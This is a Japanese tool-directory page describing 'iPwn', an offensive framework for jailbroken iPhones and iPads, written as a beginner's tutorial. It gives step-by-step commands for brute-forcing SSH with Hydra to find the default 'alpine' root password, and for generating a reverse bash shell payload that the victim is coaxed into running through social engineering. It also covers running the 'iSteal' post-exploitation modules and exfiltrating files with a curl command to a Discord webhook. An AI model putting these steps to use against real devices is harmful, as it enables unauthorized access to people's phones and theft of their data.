Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
iPwn — iOS端末のエクスプロイトを目的としたフレームワーク。 | Kitploit
ツール/GitHubGitHub/brows3r/ipwn
iOSセキュリティパスワード攻撃ペイロード生成エクスプロイトポストエクスプロイトペネトレーションテストモバイルセキュリティリモートアクセスツール
GitHubbrows3r/ipwn

iPwn

iOS端末のエクスプロイトを目的としたフレームワーク。

リポジトリを見る
233365年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

iPwn

iOSデバイスの悪用を目的としたフレームワークです。 image

<!> 注意: このツールを使って侵入しようとしているiPhoneは脱獄済みでなければなりません <!>

ステータス - ❌

このプロジェクトはまだ開発中です。端末情報の収集などのポストエクスプロイト機能を拡張するための拡張機能やオプションを追加しています。また、通常のiOS tweakにペイロードを埋め込んでリバースシェルを簡単に取得する方法も研究中です。

更新ログ

[2021/6/2] - デバイスをコンピュータに接続して弄りたい人のために、追加メニューを追加しました。間もなくさらに機能を追加予定です。

[2021/6/2] - ポストエクスプロイトツール「iSteal」に4つの追加モジュールを追加しました。また、checkra1n脱獄をインストールするオプションを追加しました。

[2021/5/25] - ポストエクスプロイトツール「iSteal」に8つの追加モジュールを追加しました。

[2021/5/25] - ポストエクスプロイトツール「iSteal」に2つの追加モジュールを追加しました。

説明/使い方 [初心者向け!!!]

iPwnは、iOSデバイスを悪用してアクセスを取得するためのフレームワークです。また、ポストエクスプロイト(デバイスへのアクセス取得後)用のミニフレームワーク「iSteal」という拡張機能もあります。この説明では、iOSデバイスにアクセスして情報を収集するためのさまざまな方法と手順を解説します。

iOSデバイスにアクセスする最初の方法 - SSHブルートフォース

ほとんどの脱獄済みiOSデバイス(Cydia搭載)にはOpenSSHがプリインストールされています。そして通常、認証情報は非常に弱いか一般的であり、最も一般的なパスワードの1つは、私のGithubからiPwnをダウンロードした場合、フォルダ内にあるワードリストに含まれているはずです。

では始めましょう!まず、スクリプトを実行します。

root@kitploit:~
python main.py

次に、「brute」コマンドを入力します。(必要であれば「help」と入力してコマンドに慣れることもできます。) image

「brute」コマンドを入力したら、「help」と入力して利用可能なすべてのコマンドを表示します。 image ここで、「default」コマンドを使用して、最も一般的なパスワードを含むワードリストでSSHブルートフォースを開始します。 ターゲットのIPアドレスを入力するよう求められます。正しく有効なIPアドレスを入力してください。Enterキーを押して次の手順に進みます。 image

<!> エラーが発生する場合、Hydraがインストールされていることを確認してください。以下のコマンドでHydraをインストールできます <!>

root@kitploit:~
hydraインストールコマンド:

sudo apt install hydra
sudo pacman -S hydra

チュートリアルに戻ります。HydraがPCにインストールされていれば、ブルートフォースの試行が開始されているはずです。約20〜40秒待ちます。デバイスがワードリストに含まれるデフォルト/一般的な認証情報を使用している場合、Hydraが正しいパスワードを示す小さなメッセージを表示します。 image

正しいパスワードは「alpine」であることがわかります。これで、別のターミナルウィンドウで「ssh root@ip_goes_here」と入力して電話にログインできます。パスワードを求められたら、Hydraで取得したパスワードを入力します。 image

ログインできました!

image

この時点で、おそらく電話の情報を収集して制御したいでしょうが、それは後回しです。まず、いくつかの非常に重要なものをインストールする必要があります。セットアップを自動化する設定ファイルをSCPで転送したい場合は、それを行ってください。ファイルは/post-exploitation/post.shにあります。 「post.sh」ファイルをiOSデバイスに転送したら、「bash post.sh」を実行してください。これにより、後で使用するポストエクスプロイトツールのインストールとセットアップが開始されます。

<!> 注: 以下のコマンドは、必要なパッケージとツールを手動でインストールしたい人のためのものです <!>

root@kitploit:~
必要なものをすべてセットアップ/インストールするために、以下のコマンドをすべて実行してください:

apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git

さて、すべてがインストールされたので、「iSteal」フォルダに移動して、ポストエクスプロイトスクリプト「iSteal」を実行します。

root@kitploit:~
python3 post.py

<!> 注: Pythonファイルを実行するときは、「python」や「py」ではなく「python3」を使用してください <!>

これでスクリプトが読み込まれました。「help」コマンドを使用して確認することもできます。 image

次に、「list」コマンドを使用して、ポストエクスプロイトで利用可能なモジュール/オプションを表示します。 image

<!> 注意: ポストエクスプロイトスクリプトは頻繁に更新され、モジュールも追加されるため、正確を期すためにこの画像も更新されます <!>

モジュールを使用するには、「use specific/module」のように入力します。例: use modules/list_installed_default_apps

このモジュールを実行すると、ターゲットのiOSデバイスにインストールされているデフォルトアプリケーションが表示されます。 image

iOSデバイスにアクセスする2番目の方法 - リバースシェル

では、2番目の方法をお見せします。これは少し高度です。このパートでは画像は含めません。

root@kitploit:~
「python main.py」でiPwnフレームワークを実行します。
「payload」コマンドを入力します。
ペイロードファクトリがロードされるのを待ちます。
好きなペイロードを選択します。例: use payloads/factory/reverse_bash
自分のIPを入力します。
自分のポートを入力します。
「payload generated」というメッセージが表示されるはずです。
「back」コマンドを入力してメインメニューに戻ります。
「listen」コマンドを入力して着信接続を待ち受けます。
ターゲットがターミナルまたは独自の方法でスクリプトを実行することを確認します。ソーシャルエンジニアリングを試みて、創造的になりましょう!
被害者のiOSデバイスでスクリプトが実行されると、接続が得られます。
「post.sh」(/post-exploitationにあります)を転送して実行するか、手動で重要なパッケージをインストールします。
これで「iSteal」または「AutoEnum」のポストエクスプロイトツールを実行できます。
楽しんでください!:)

<!> ステップ2を実行中に重要なパッケージ/ツールのインストールで行き詰まった場合は、ステップ1に戻ってパッケージ/ツールのインストールガイドをコピーしてください! <!>

ファイル転送/抽出

iOSデバイスにファイルを転送する方法は複数あり、ダウンロードする方法も多数あります。iOSデバイスからファイルを抽出してダウンロードする最も簡単な方法は、CurlとDiscordウェブフックを使用することです。

<!> 注: 以下のセクションでは、curlを使用してiOSデバイスからファイルを抽出およびダウンロードする方法を示します <!>

root@kitploit:~
ステップ1: Discordサーバーを作成します。
ステップ2: ウェブフックを作成し、リンクをコピーします。
ステップ3: iOSデバイスで、取得したいファイルが含まれているディレクトリに移動します。
ステップ4: 以下のコマンドを入力します(file_here.txtはファイル名に、webhook_url_hereはウェブフックURLに置き換えてください)

curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here

ステップ5: 約10〜50秒待ちます。
完了!ファイルはDiscordサーバーにアップロードされました。ファイルをダウンロードまたは表示できます。

テスト済みOS

root@kitploit:~
Windows 10 - 安定
Garuda Linux - 安定
Archベースのディストリビューション - 安定

サポートおよびテスト済みiOSデバイス

root@kitploit:~
サポート対象デバイス [ポストエクスプロイト拡張機能はこれらすべてで動作するはずです]
-----------------
第4世代iPod以降のiPod
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12

私自身がテストしたデバイス [実際に自分でテストしたもの]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod 第4世代

スクリーンショット

image image image image

クレジット

[https://github.com/0x1CA3]

ツールをダウンロード